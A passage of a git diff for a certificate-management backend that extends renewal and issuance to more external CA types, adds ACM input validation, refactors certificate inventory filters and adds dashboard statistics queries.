+ 1000 * 60 * 60 * 24 * 30), + projectId: "project-123", + status: CertStatus.ACTIVE, + revokedAt: null + }; + + const mockProfile = { + id: "profile-123", + enrollmentType: EnrollmentType.ACME, + issuerType: IssuerType.CA, + projectId: "project-123" + }; + + vi.mocked(mockCertificateDAL.findById).mockResolvedValue(mockCert as any); + vi.mocked(mockCertificateProfileDAL.findByIdWithConfigs).mockResolvedValue(mockProfile as any); + + await expect( + service.updateRenewalConfig({ + actor: ActorType.USER, + actorId: "user-123", + actorAuthMethod: AuthMethod.EMAIL, + actorOrgId: "org-123", + certificateId: "cert-123", + renewBeforeDays: 7 + }) + ).rejects.toThrow(ForbiddenRequestError); + + await expect( + service.updateRenewalConfig({ + actor: ActorType.USER, + actorId: "user-123", + actorAuthMethod: AuthMethod.EMAIL, + actorOrgId: "org-123", + certificateId: "cert-123", + renewBeforeDays: 7 + }) + ).rejects.toThrow("Certificate is not eligible for auto-renewal: ACME certificates cannot be auto-renewed"); + }); + it("should reject update if renewBeforeDays >= certificate TTL", async () => { const mockCert = { id: "cert-123", diff --git a/backend/src/services/certificate-v3/certificate-v3-service.ts b/backend/src/services/certificate-v3/certificate-v3-service.ts index 81e2731891c..773ccdf6156 100644 --- a/backend/src/services/certificate-v3/certificate-v3-service.ts +++ b/backend/src/services/certificate-v3/certificate-v3-service.ts @@ -34,6 +34,7 @@ import { CertSignatureAlgorithm, CertStatus } from "@app/services/certificate/certificate-types"; +import { validateAcmIssuanceInputs } from "@app/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-fns"; import { TCertificateAuthorityDALFactory, TCertificateAuthorityWithAssociatedCa @@ -276,7 +277,13 @@ const validateRenewalEligibility = ( const caType = (ca.externalCa?.type as CaType) ?? 
CaType.INTERNAL; const isInternalCa = caType === CaType.INTERNAL; - const isConnectedExternalCa = caType === CaType.ACME || caType === CaType.AZURE_AD_CS || caType === CaType.AWS_PCA; + const isConnectedExternalCa = + caType === CaType.ACME || + caType === CaType.AZURE_AD_CS || + caType === CaType.AWS_PCA || + caType === CaType.AWS_ACM_PUBLIC_CA || + caType === CaType.DIGICERT || + caType === CaType.VENAFI_TPP; const isImportedCertificate = certificate.pkiSubscriberId != null && !certificate.profileId; if (!isInternalCa && !isConnectedExternalCa) { @@ -1709,6 +1716,28 @@ export const certificateV3ServiceFactory = ({ }); } + // ACM pre-flight validation runs before the approval branch so bad inputs (e.g., a TTL that + // isn't ACM's fixed 198 days) are rejected at submit time rather than after the approver has + // already approved a request that's guaranteed to fail downstream. + if (profile.caId) { + const preflightCa = await certificateAuthorityDAL.findByIdWithAssociatedCa(profile.caId); + if (preflightCa?.externalCa?.type === CaType.AWS_ACM_PUBLIC_CA) { + validateAcmIssuanceInputs({ + csr: certificateOrder.csr, + keyAlgorithm: certificateOrder.keyAlgorithm, + altNames: certificateOrder.altNames, + ttl: certificateOrder.validity?.ttl, + notBefore: certificateOrder.notBefore, + notAfter: certificateOrder.notAfter, + organization: certificateRequest.organization, + organizationalUnit: certificateRequest.organizationalUnit, + country: certificateRequest.country, + state: certificateRequest.state, + locality: certificateRequest.locality + }); + } + } + const orderApprovalFactory = APPROVAL_POLICY_FACTORY_MAP[ApprovalPolicyType.CertRequest]( ApprovalPolicyType.CertRequest ); @@ -1853,7 +1882,32 @@ export const certificateV3ServiceFactory = ({ }); } - if (caType === CaType.ACME || caType === CaType.AZURE_AD_CS || caType === CaType.AWS_PCA) { + if ( + caType === CaType.ACME || + caType === CaType.AZURE_AD_CS || + caType === CaType.AWS_PCA || + caType === CaType.DIGICERT 
|| + caType === CaType.AWS_ACM_PUBLIC_CA || + caType === CaType.VENAFI_TPP + ) { + // Pre-flight validation for ACM β€” reject bad inputs synchronously so the user + // gets a 400 on submit rather than a FAILED request row after the job runs. + if (caType === CaType.AWS_ACM_PUBLIC_CA) { + validateAcmIssuanceInputs({ + csr: certificateOrder.csr, + keyAlgorithm: certificateOrder.keyAlgorithm, + altNames: certificateOrder.altNames, + ttl: certificateOrder.validity?.ttl, + notBefore: certificateOrder.notBefore, + notAfter: certificateOrder.notAfter, + organization: certificateRequest.organization, + organizationalUnit: certificateRequest.organizationalUnit, + country: certificateRequest.country, + state: certificateRequest.state, + locality: certificateRequest.locality + }); + } + const orderId = randomUUID(); const certRequest = await certificateRequestService.createCertificateRequest({ @@ -1895,6 +1949,7 @@ export const certificateV3ServiceFactory = ({ certificateId: orderId, profileId: profile.id, caId: profile.caId || "", + caType, ttl: certificateOrder.validity?.ttl || "1y", signatureAlgorithm: certificateOrder.signatureAlgorithm || "", keyAlgorithm: certificateRequest.keyAlgorithm || "", @@ -2181,7 +2236,14 @@ export const certificateV3ServiceFactory = ({ throw new NotFoundError({ message: "Certificate was signed but could not be found in database" }); } newCert = foundCert; - } else if (caType === CaType.ACME || caType === CaType.AZURE_AD_CS || caType === CaType.AWS_PCA) { + } else if ( + caType === CaType.ACME || + caType === CaType.AZURE_AD_CS || + caType === CaType.AWS_PCA || + caType === CaType.DIGICERT || + caType === CaType.AWS_ACM_PUBLIC_CA || + caType === CaType.VENAFI_TPP + ) { // External CA renewal - mark for async processing outside transaction return { isExternalCA: true, @@ -2361,6 +2423,7 @@ export const certificateV3ServiceFactory = ({ certificateId: renewalOrderId, profileId: profile?.id || "", caId: ca.id, + caType: (ca.externalCa?.type as 
CaType) ?? CaType.INTERNAL, commonName: originalCert.commonName || "", altNames: structuredAltNames, ttl, @@ -2480,7 +2543,7 @@ export const certificateV3ServiceFactory = ({ if (profile.enrollmentType !== EnrollmentType.API) { throw new ForbiddenRequestError({ - message: "Certificate is not eligible for auto-renewal: EST certificates cannot be auto-renewed" + message: `Certificate is not eligible for auto-renewal: ${profile.enrollmentType.toUpperCase()} certificates cannot be auto-renewed` }); } @@ -2597,7 +2660,7 @@ export const certificateV3ServiceFactory = ({ if (profile.enrollmentType !== EnrollmentType.API) { throw new ForbiddenRequestError({ - message: "Certificate is not eligible for auto-renewal: EST certificates cannot be auto-renewed" + message: `Certificate is not eligible for auto-renewal: ${profile.enrollmentType.toUpperCase()} certificates cannot be auto-renewed` }); } diff --git a/backend/src/services/certificate/certificate-dal.ts b/backend/src/services/certificate/certificate-dal.ts index 7e0c2a35282..207ff832e1e 100644 --- a/backend/src/services/certificate/certificate-dal.ts +++ b/backend/src/services/certificate/certificate-dal.ts @@ -12,7 +12,24 @@ import { import { isUuidV4 } from "@app/lib/validator"; import { applyMetadataFilter } from "@app/services/resource-metadata/resource-metadata-fns"; -import { CertStatus } from "./certificate-types"; +import { keySizeToAlgorithms } from "./certificate-fns"; +import { CertKeyAlgorithm, CertStatus } from "./certificate-types"; + +// Scoped to UI-surfaced algorithms; intentionally narrower than pqc-utils.PQC_ALGORITHMS. 
+export const PQC_KEY_ALGORITHMS: string[] = [ + CertKeyAlgorithm.ML_DSA_44, + CertKeyAlgorithm.ML_DSA_65, + CertKeyAlgorithm.ML_DSA_87 +]; + +export const NON_PQC_KEY_ALGORITHMS: string[] = [ + CertKeyAlgorithm.RSA_2048, + CertKeyAlgorithm.RSA_3072, + CertKeyAlgorithm.RSA_4096, + CertKeyAlgorithm.ECDSA_P256, + CertKeyAlgorithm.ECDSA_P384, + CertKeyAlgorithm.ECDSA_P521 +]; export type TCertificateDALFactory = ReturnType; @@ -48,19 +65,7 @@ export const certificateDALFactory = (db: TDbClient) => { } }; - const countCertificatesInProject = async ({ - projectId, - friendlyName, - commonName, - search, - status, - profileIds, - fromDate, - toDate, - metadataFilter, - extendedKeyUsage - }: { - projectId: string; + type TInventoryFilterParams = { friendlyName?: string; commonName?: string; search?: string; @@ -70,91 +75,189 @@ export const certificateDALFactory = (db: TDbClient) => { toDate?: Date; metadataFilter?: Array<{ key: string; value?: string }>; extendedKeyUsage?: string; - }) => { - try { - interface CountResult { - count: string; - } + keyAlgorithm?: string | string[]; + signatureAlgorithm?: string; + keySizes?: number[]; + caIds?: string[]; + enrollmentTypes?: string[]; + source?: string | string[]; + notAfterFrom?: Date; + notAfterTo?: Date; + notBeforeFrom?: Date; + notBeforeTo?: Date; + }; - let query = db - .replicaNode()(TableName.Certificate) - .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) - .join(TableName.Project, `${TableName.CertificateAuthority}.projectId`, `${TableName.Project}.id`) - .where(`${TableName.Project}.id`, projectId); + const applyInventoryFilters = ( + query: Knex.QueryBuilder, + filters: TInventoryFilterParams, + hasProfileJoin: boolean + ): Knex.QueryBuilder => { + let q = query; - if (friendlyName) { - const sanitizedValue = sanitizeSqlLikeString(friendlyName); - query = query.andWhere(`${TableName.Certificate}.friendlyName`, "like", `%${sanitizedValue}%`); - } + if 
(filters.friendlyName) { + const sanitizedValue = sanitizeSqlLikeString(filters.friendlyName); + q = q.andWhere(`${TableName.Certificate}.friendlyName`, "like", `%${sanitizedValue}%`); + } - if (commonName) { - const sanitizedValue = sanitizeSqlLikeString(commonName); - query = query.andWhere(`${TableName.Certificate}.commonName`, "like", `%${sanitizedValue}%`); - } + if (filters.commonName) { + const sanitizedValue = sanitizeSqlLikeString(filters.commonName); + q = q.andWhere(`${TableName.Certificate}.commonName`, "like", `%${sanitizedValue}%`); + } + + if (filters.search) { + const sanitizedValue = sanitizeSqlLikeString(filters.search); + q = q.andWhere((qb: Knex.QueryBuilder) => { + void qb + .where(`${TableName.Certificate}.commonName`, "like", `%${sanitizedValue}%`) + .orWhere(`${TableName.Certificate}.altNames`, "like", `%${sanitizedValue}%`) + .orWhere(`${TableName.Certificate}.serialNumber`, "like", `%${sanitizedValue}%`) + .orWhere(`${TableName.Certificate}.friendlyName`, "like", `%${sanitizedValue}%`); + + if (isUuidV4(sanitizedValue)) { + void qb.orWhere(`${TableName.Certificate}.id`, sanitizedValue); + } + }); + } - if (search) { - const sanitizedValue = sanitizeSqlLikeString(search); - query = query.andWhere((qb) => { - void qb - .where(`${TableName.Certificate}.commonName`, "like", `%${sanitizedValue}%`) - .orWhere(`${TableName.Certificate}.altNames`, "like", `%${sanitizedValue}%`) - .orWhere(`${TableName.Certificate}.serialNumber`, "like", `%${sanitizedValue}%`) - .orWhere(`${TableName.Certificate}.friendlyName`, "like", `%${sanitizedValue}%`); - - if (isUuidV4(sanitizedValue)) { - void qb.orWhere(`${TableName.Certificate}.id`, sanitizedValue); + if (filters.status) { + const now = new Date(); + const statuses = Array.isArray(filters.status) ? filters.status : [filters.status]; + + q = q.andWhere((qb: Knex.QueryBuilder) => { + statuses.forEach((statusValue, index) => { + const whereMethod = index === 0 ? 
"where" : "orWhere"; + + if (statusValue === CertStatus.ACTIVE) { + void qb[whereMethod]((innerQb: Knex.QueryBuilder) => { + void innerQb + .where(`${TableName.Certificate}.notAfter`, ">", now) + .andWhere(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED); + }); + } else if (statusValue === CertStatus.EXPIRED) { + void qb[whereMethod]((innerQb: Knex.QueryBuilder) => { + void innerQb + .where(`${TableName.Certificate}.notAfter`, "<=", now) + .andWhere(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED); + }); + } else { + void qb[whereMethod](`${TableName.Certificate}.status`, statusValue); } }); - } + }); + } - if (status) { - const now = new Date(); - const statuses = Array.isArray(status) ? status : [status]; - - query = query.andWhere((qb) => { - statuses.forEach((statusValue, index) => { - const whereMethod = index === 0 ? "where" : "orWhere"; - - if (statusValue === CertStatus.ACTIVE) { - void qb[whereMethod]((innerQb) => { - void innerQb - .where(`${TableName.Certificate}.notAfter`, ">", now) - .andWhere(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED); - }); - } else if (statusValue === CertStatus.EXPIRED) { - void qb[whereMethod]((innerQb) => { - void innerQb - .where(`${TableName.Certificate}.notAfter`, "<=", now) - .andWhere(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED); - }); - } else { - void qb[whereMethod](`${TableName.Certificate}.status`, statusValue); - } - }); - }); - } + if (filters.fromDate) { + q = q.andWhere(`${TableName.Certificate}.createdAt`, ">=", filters.fromDate); + } - if (fromDate) { - query = query.andWhere(`${TableName.Certificate}.createdAt`, ">=", fromDate); - } + if (filters.toDate) { + q = q.andWhere(`${TableName.Certificate}.createdAt`, "<=", filters.toDate); + } + + if (filters.profileIds) { + q = q.whereIn(`${TableName.Certificate}.profileId`, filters.profileIds); + } + + if (filters.metadataFilter && filters.metadataFilter.length > 0) { + q = applyMetadataFilter(q, 
filters.metadataFilter, "certificateId", TableName.Certificate); + } + + if (filters.extendedKeyUsage) { + q = q.whereRaw(`"${TableName.Certificate}"."extendedKeyUsages" @> ARRAY[?]::text[]`, [filters.extendedKeyUsage]); + } - if (toDate) { - query = query.andWhere(`${TableName.Certificate}.createdAt`, "<=", toDate); + if (filters.keyAlgorithm) { + if (Array.isArray(filters.keyAlgorithm)) { + q = q.whereIn(`${TableName.Certificate}.keyAlgorithm`, filters.keyAlgorithm); + } else { + q = q.andWhere(`${TableName.Certificate}.keyAlgorithm`, filters.keyAlgorithm); } + } + + if (filters.signatureAlgorithm) { + q = q.andWhere(`${TableName.Certificate}.signatureAlgorithm`, filters.signatureAlgorithm); + } + + if (filters.keySizes && filters.keySizes.length > 0) { + const allAlgorithms = filters.keySizes.flatMap((size) => keySizeToAlgorithms(size)); + q = q.whereIn(`${TableName.Certificate}.keyAlgorithm`, allAlgorithms); + } + + if (filters.caIds) { + q = q.whereIn(`${TableName.Certificate}.caId`, filters.caIds); + } + + if (filters.enrollmentTypes && hasProfileJoin) { + q = q.whereIn(`${TableName.PkiCertificateProfile}.enrollmentType`, filters.enrollmentTypes); + } + + if (filters.source) { + const sources = Array.isArray(filters.source) ? 
filters.source : [filters.source]; + const includesIssued = sources.includes("issued"); + const otherSources = sources.filter((s) => s !== "issued"); - if (profileIds) { - query = query.whereIn(`${TableName.Certificate}.profileId`, profileIds); + q = q.andWhere((qb: Knex.QueryBuilder) => { + if (otherSources.length > 0) { + void qb.whereIn(`${TableName.Certificate}.source`, otherSources); + } + if (includesIssued) { + void qb.orWhere(`${TableName.Certificate}.source`, "issued").orWhereNull(`${TableName.Certificate}.source`); + } + }); + } + + if (filters.notAfterFrom) { + q = q.andWhere(`${TableName.Certificate}.notAfter`, ">=", filters.notAfterFrom); + } + + if (filters.notAfterTo) { + q = q.andWhere(`${TableName.Certificate}.notAfter`, "<=", filters.notAfterTo); + } + + if (filters.notBeforeFrom) { + q = q.andWhere(`${TableName.Certificate}.notBefore`, ">=", filters.notBeforeFrom); + } + + if (filters.notBeforeTo) { + q = q.andWhere(`${TableName.Certificate}.notBefore`, "<=", filters.notBeforeTo); + } + + return q; + }; + + const countCertificatesInProject = async ( + { + projectId, + ...filters + }: { + projectId: string; + } & TInventoryFilterParams, + permissionFilters?: ProcessedPermissionRules + ) => { + try { + interface CountResult { + count: string; } - if (metadataFilter && metadataFilter.length > 0) { - query = applyMetadataFilter(query, metadataFilter, "certificateId", TableName.Certificate); + let query = db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .join(TableName.Project, `${TableName.CertificateAuthority}.projectId`, `${TableName.Project}.id`) + .where(`${TableName.Project}.id`, projectId); + + const hasEnrollmentTypeFilter = Boolean(filters.enrollmentTypes); + if (hasEnrollmentTypeFilter) { + query = query.leftJoin( + TableName.PkiCertificateProfile, + `${TableName.Certificate}.profileId`, + `${TableName.PkiCertificateProfile}.id` + ); 
} - if (extendedKeyUsage) { - // PostgreSQL array containment: extendedKeyUsages @> ARRAY['codeSigning']::text[] - query = query.whereRaw(`"${TableName.Certificate}"."extendedKeyUsages" @> ARRAY[?]::text[]`, [ - extendedKeyUsage - ]); + query = applyInventoryFilters(query, filters, hasEnrollmentTypeFilter) as typeof query; + + if (permissionFilters) { + query = applyProcessedPermissionRulesToQuery(query, TableName.Certificate, permissionFilters) as typeof query; } const count = await query.count("*").first(); @@ -225,7 +328,7 @@ export const certificateDALFactory = (db: TDbClient) => { }; const findActiveCertificatesForSync = async ( - filter: Partial, + filter: Partial & TInventoryFilterParams>, options?: { limit?: number; offset?: number }, permissionFilters?: ProcessedPermissionRules ): Promise<(TCertificates & { hasPrivateKey: boolean })[]> => { @@ -356,29 +459,37 @@ export const certificateDALFactory = (db: TDbClient) => { } }; + type TCertificateWithInventoryFields = TCertificates & { + hasPrivateKey: boolean; + caName?: string | null; + profileName?: string | null; + enrollmentType?: string | null; + }; + const findWithPrivateKeyInfo = async ( - filter: Partial< - TCertificates & { - friendlyName?: string; - commonName?: string; - search?: string; - status?: string | string[]; - profileIds?: string[]; - fromDate?: Date; - toDate?: Date; - metadataFilter?: Array<{ key: string; value?: string }>; - extendedKeyUsage?: string; - } - >, + filter: Partial & TInventoryFilterParams>, options?: { offset?: number; limit?: number; sort?: [string, "asc" | "desc"][] }, permissionFilters?: ProcessedPermissionRules - ): Promise<(TCertificates & { hasPrivateKey: boolean })[]> => { + ): Promise => { try { let query = db .replicaNode()(TableName.Certificate) .leftJoin(TableName.CertificateSecret, `${TableName.Certificate}.id`, `${TableName.CertificateSecret}.certId`) + .leftJoin( + TableName.CertificateAuthority, + `${TableName.Certificate}.caId`, + 
`${TableName.CertificateAuthority}.id` + ) + .leftJoin( + TableName.PkiCertificateProfile, + `${TableName.Certificate}.profileId`, + `${TableName.PkiCertificateProfile}.id` + ) .select(selectAllTableCols(TableName.Certificate)) - .select(db.ref(`${TableName.CertificateSecret}.certId`).as("privateKeyRef")); + .select(db.ref(`${TableName.CertificateSecret}.certId`).as("privateKeyRef")) + .select(db.ref("name").withSchema(TableName.CertificateAuthority).as("caName")) + .select(db.ref("slug").withSchema(TableName.PkiCertificateProfile).as("profileName")) + .select(db.ref("enrollmentType").withSchema(TableName.PkiCertificateProfile).as("enrollmentType")); const { friendlyName, @@ -390,6 +501,16 @@ export const certificateDALFactory = (db: TDbClient) => { toDate, metadataFilter, extendedKeyUsage, + keyAlgorithm, + signatureAlgorithm, + keySizes, + caIds, + enrollmentTypes, + source, + notAfterFrom, + notAfterTo, + notBeforeFrom, + notBeforeTo, ...regularFilters } = filter; @@ -399,80 +520,31 @@ export const certificateDALFactory = (db: TDbClient) => { } }); - if (friendlyName) { - const sanitizedValue = sanitizeSqlLikeString(friendlyName); - query = query.andWhere(`${TableName.Certificate}.friendlyName`, "like", `%${sanitizedValue}%`); - } - - if (commonName) { - const sanitizedValue = sanitizeSqlLikeString(commonName); - query = query.andWhere(`${TableName.Certificate}.commonName`, "like", `%${sanitizedValue}%`); - } - - if (search) { - const sanitizedValue = sanitizeSqlLikeString(search); - query = query.andWhere((qb) => { - void qb - .where(`${TableName.Certificate}.commonName`, "like", `%${sanitizedValue}%`) - .orWhere(`${TableName.Certificate}.altNames`, "like", `%${sanitizedValue}%`) - .orWhere(`${TableName.Certificate}.serialNumber`, "like", `%${sanitizedValue}%`) - .orWhere(`${TableName.Certificate}.friendlyName`, "like", `%${sanitizedValue}%`); - - if (isUuidV4(sanitizedValue)) { - void qb.orWhere(`${TableName.Certificate}.id`, sanitizedValue); - } - }); - } - - 
if (status) { - const now = new Date(); - const statuses = Array.isArray(status) ? status : [status]; - - query = query.andWhere((qb) => { - statuses.forEach((statusValue, index) => { - const whereMethod = index === 0 ? "where" : "orWhere"; - - if (statusValue === CertStatus.ACTIVE) { - void qb[whereMethod]((innerQb) => { - void innerQb - .where(`${TableName.Certificate}.notAfter`, ">", now) - .andWhere(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED); - }); - } else if (statusValue === CertStatus.EXPIRED) { - void qb[whereMethod]((innerQb) => { - void innerQb - .where(`${TableName.Certificate}.notAfter`, "<=", now) - .andWhere(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED); - }); - } else { - void qb[whereMethod](`${TableName.Certificate}.status`, statusValue); - } - }); - }); - } - - if (fromDate) { - query = query.andWhere(`${TableName.Certificate}.createdAt`, ">=", fromDate); - } - - if (toDate) { - query = query.andWhere(`${TableName.Certificate}.createdAt`, "<=", toDate); - } - - if (profileIds) { - query = query.whereIn(`${TableName.Certificate}.profileId`, profileIds); - } - - if (metadataFilter && metadataFilter.length > 0) { - query = applyMetadataFilter(query, metadataFilter, "certificateId", TableName.Certificate); - } - - if (extendedKeyUsage) { - // PostgreSQL array containment: extendedKeyUsages @> ARRAY['codeSigning']::text[] - query = query.whereRaw(`"${TableName.Certificate}"."extendedKeyUsages" @> ARRAY[?]::text[]`, [ - extendedKeyUsage - ]); - } + query = applyInventoryFilters( + query, + { + friendlyName, + commonName, + search, + status, + profileIds, + fromDate, + toDate, + metadataFilter, + extendedKeyUsage, + keyAlgorithm, + signatureAlgorithm, + keySizes, + caIds, + enrollmentTypes, + source, + notAfterFrom, + notAfterTo, + notBeforeFrom, + notBeforeTo + }, + true + ) as typeof query; if (permissionFilters) { query = applyProcessedPermissionRulesToQuery(query, TableName.Certificate, permissionFilters) as typeof 
query; @@ -486,17 +558,15 @@ export const certificateDALFactory = (db: TDbClient) => { } if (options?.sort) { options.sort.forEach(([column, direction]) => { - query = query.orderBy(column, direction); + query = query.orderBy(`${TableName.Certificate}.${column}`, direction); }); } const results = await query; - return results.map((row) => { - return { - ...row, - hasPrivateKey: row.privateKeyRef !== null - }; - }); + return results.map((row) => ({ + ...row, + hasPrivateKey: row.privateKeyRef !== null + })); } catch (error) { throw new DatabaseError({ error, name: "Find certificates with private key info" }); } @@ -508,7 +578,6 @@ export const certificateDALFactory = (db: TDbClient) => { caType?: "internal" | "external" | null; }; - // Flexible lookup filter for certificate queries - either id or serialNumber, not both type TCertificateLookupFilter = { id: string; serialNumber?: never } | { id?: never; serialNumber: string }; const findWithFullDetails = async ( @@ -516,8 +585,7 @@ export const certificateDALFactory = (db: TDbClient) => { tx?: Knex ): Promise => { try { - let query = (tx || db) - .replicaNode()(TableName.Certificate) + let query = (tx || db.replicaNode())(TableName.Certificate) .leftJoin( TableName.CertificateAuthority, `${TableName.Certificate}.caId`, @@ -538,7 +606,6 @@ export const certificateDALFactory = (db: TDbClient) => { .select(db.ref("slug").withSchema(TableName.PkiCertificateProfile).as("profileName")) .select(db.ref("id").withSchema(TableName.InternalCertificateAuthority).as("internalCaId")); - // Dynamic where clause based on filter if (filter.id) { query = query.where(`${TableName.Certificate}.id`, filter.id); } else { @@ -566,6 +633,378 @@ export const certificateDALFactory = (db: TDbClient) => { } }; + const getDashboardStats = async (projectId: string) => { + try { + const now = new Date(); + const thirtyDaysFromNow = new Date(now.getTime() + 30 * 24 * 60 * 60 * 1000); + + interface TotalsRow { + total: number; + active: number; + 
expiringSoon: number; + expired: number; + revoked: number; + expiringSoonNoAutoRenewal: number; + expiredNotRenewed: number; + } + + interface LabelCount { + label: string | null; + count: string; + } + + interface LabelCountWithId extends LabelCount { + id: string; + } + + interface BucketCount { + bucket: string; + count: string; + } + + const [totalsRow] = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .select( + db.raw("COUNT(*)::int as total"), + db.raw( + `COUNT(*) FILTER (WHERE "${TableName.Certificate}"."notAfter" > ? AND "${TableName.Certificate}"."status" != ?)::int as active`, + [now, CertStatus.REVOKED] + ), + db.raw( + `COUNT(*) FILTER (WHERE "${TableName.Certificate}"."notAfter" > ? AND "${TableName.Certificate}"."notAfter" <= ? AND "${TableName.Certificate}"."status" != ?)::int as "expiringSoon"`, + [now, thirtyDaysFromNow, CertStatus.REVOKED] + ), + db.raw( + `COUNT(*) FILTER (WHERE "${TableName.Certificate}"."notAfter" <= ? AND "${TableName.Certificate}"."status" != ?)::int as expired`, + [now, CertStatus.REVOKED] + ), + db.raw(`COUNT(*) FILTER (WHERE "${TableName.Certificate}"."status" = ?)::int as revoked`, [ + CertStatus.REVOKED + ]), + db.raw( + `COUNT(*) FILTER (WHERE "${TableName.Certificate}"."notAfter" > ? AND "${TableName.Certificate}"."notAfter" <= ? AND "${TableName.Certificate}"."status" != ? AND "${TableName.Certificate}"."renewBeforeDays" IS NULL)::int as "expiringSoonNoAutoRenewal"`, + [now, thirtyDaysFromNow, CertStatus.REVOKED] + ), + db.raw( + `COUNT(*) FILTER (WHERE "${TableName.Certificate}"."notAfter" <= ? AND "${TableName.Certificate}"."status" != ? 
AND "${TableName.Certificate}"."renewedByCertificateId" IS NULL)::int as "expiredNotRenewed"`, + [now, CertStatus.REVOKED] + ) + ); + + const totals = totalsRow as unknown as TotalsRow; + + const byAlgorithm = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .select(`${TableName.Certificate}.keyAlgorithm as label`) + .count("* as count") + .groupBy(`${TableName.Certificate}.keyAlgorithm`); + + const byCA = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .select(`${TableName.CertificateAuthority}.id as id`) + .select(`${TableName.CertificateAuthority}.name as label`) + .count("* as count") + .groupBy(`${TableName.CertificateAuthority}.id`, `${TableName.CertificateAuthority}.name`); + + const byStatus = [ + { label: "Active", count: totals.active }, + { label: "Expired", count: totals.expired }, + { label: "Revoked", count: totals.revoked } + ]; + + const byEnrollmentMethod = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .leftJoin( + TableName.PkiCertificateProfile, + `${TableName.Certificate}.profileId`, + `${TableName.PkiCertificateProfile}.id` + ) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .select(db.raw(`COALESCE("${TableName.PkiCertificateProfile}"."enrollmentType", 'API') as label`)) + .count("* as count") + .groupBy("label"); + + const sevenDaysFromNow = new Date(now.getTime() + 7 * 24 * 60 * 60 * 1000); + const sixtyDaysFromNow = new Date(now.getTime() + 60 * 24 * 60 * 60 * 1000); + const ninetyDaysFromNow = new Date(now.getTime() + 90 * 24 * 60 * 60 * 1000); 
+ + const expirationBuckets = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .where(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED) + .select( + db.raw( + `CASE + WHEN "${TableName.Certificate}"."notAfter" < ? THEN 'expired' + WHEN "${TableName.Certificate}"."notAfter" <= ? THEN '0-7d' + WHEN "${TableName.Certificate}"."notAfter" <= ? THEN '8-30d' + WHEN "${TableName.Certificate}"."notAfter" <= ? THEN '31-60d' + WHEN "${TableName.Certificate}"."notAfter" <= ? THEN '61-90d' + ELSE '90d+' + END as bucket`, + [now, sevenDaysFromNow, thirtyDaysFromNow, sixtyDaysFromNow, ninetyDaysFromNow] + ) + ) + .select(db.raw("count(*)::int as count")) + .groupBy("bucket"); + + const validityBuckets = await db + .replicaNode()(TableName.Certificate) + .where(`${TableName.Certificate}.projectId`, projectId) + .where(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED) + .where(`${TableName.Certificate}.notAfter`, ">", now) + .whereRaw(`"${TableName.Certificate}"."extendedKeyUsages" @> ARRAY[?]::text[]`, ["serverAuth"]) + .select( + db.raw( + `CASE + WHEN EXTRACT(EPOCH FROM ("${TableName.Certificate}"."notAfter" - "${TableName.Certificate}"."notBefore")) / 86400 <= 47 THEN '<=47d' + WHEN EXTRACT(EPOCH FROM ("${TableName.Certificate}"."notAfter" - "${TableName.Certificate}"."notBefore")) / 86400 <= 99 THEN '48-99d' + WHEN EXTRACT(EPOCH FROM ("${TableName.Certificate}"."notAfter" - "${TableName.Certificate}"."notBefore")) / 86400 <= 199 THEN '100-199d' + ELSE '>=200d' + END as bucket` + ) + ) + .select(db.raw("count(*)::int as count")) + .groupBy("bucket"); + + return { + totals: { + total: totals.total, + active: totals.active, + expiringSoon: totals.expiringSoon, + expired: totals.expired, + revoked: totals.revoked + }, + expiringSoonNoAutoRenewal: totals.expiringSoonNoAutoRenewal, 
+ expiredNotRenewed: totals.expiredNotRenewed, + distributions: { + byEnrollmentMethod: (byEnrollmentMethod as unknown as LabelCount[]).map((r) => ({ + label: r.label || "Unknown", + count: Number(r.count) + })), + byAlgorithm: (byAlgorithm as unknown as LabelCount[]).map((r) => ({ + label: r.label || "Unknown", + count: Number(r.count) + })), + byCA: (byCA as unknown as LabelCountWithId[]).map((r) => ({ + id: r.id, + label: r.label || "Unknown", + count: Number(r.count) + })), + byStatus + }, + expirationBuckets: (expirationBuckets as unknown as BucketCount[]).map((r) => ({ + bucket: r.bucket, + count: Number(r.count) + })), + validityBuckets: (validityBuckets as unknown as BucketCount[]).map((r) => ({ + bucket: r.bucket, + count: Number(r.count) + })) + }; + } catch (error) { + throw new DatabaseError({ error, name: "Get dashboard stats" }); + } + }; + + const getActivityTrend = async (projectId: string, daysBack: number) => { + try { + const startDate = new Date(); + startDate.setDate(startDate.getDate() - daysBack); + startDate.setHours(0, 0, 0, 0); + const now = new Date(); + + const useDaily = daysBack <= 30; + + if (!useDaily) { + startDate.setDate(1); + } + const truncUnit = useDaily ? "day" : "month"; + const dateFormat = useDaily ? "YYYY-MM-DD" : "YYYY-MM"; + + const periodExpr = (col: string) => + db.raw(`to_char(date_trunc(?, "${TableName.Certificate}"."${col}"), ?) 
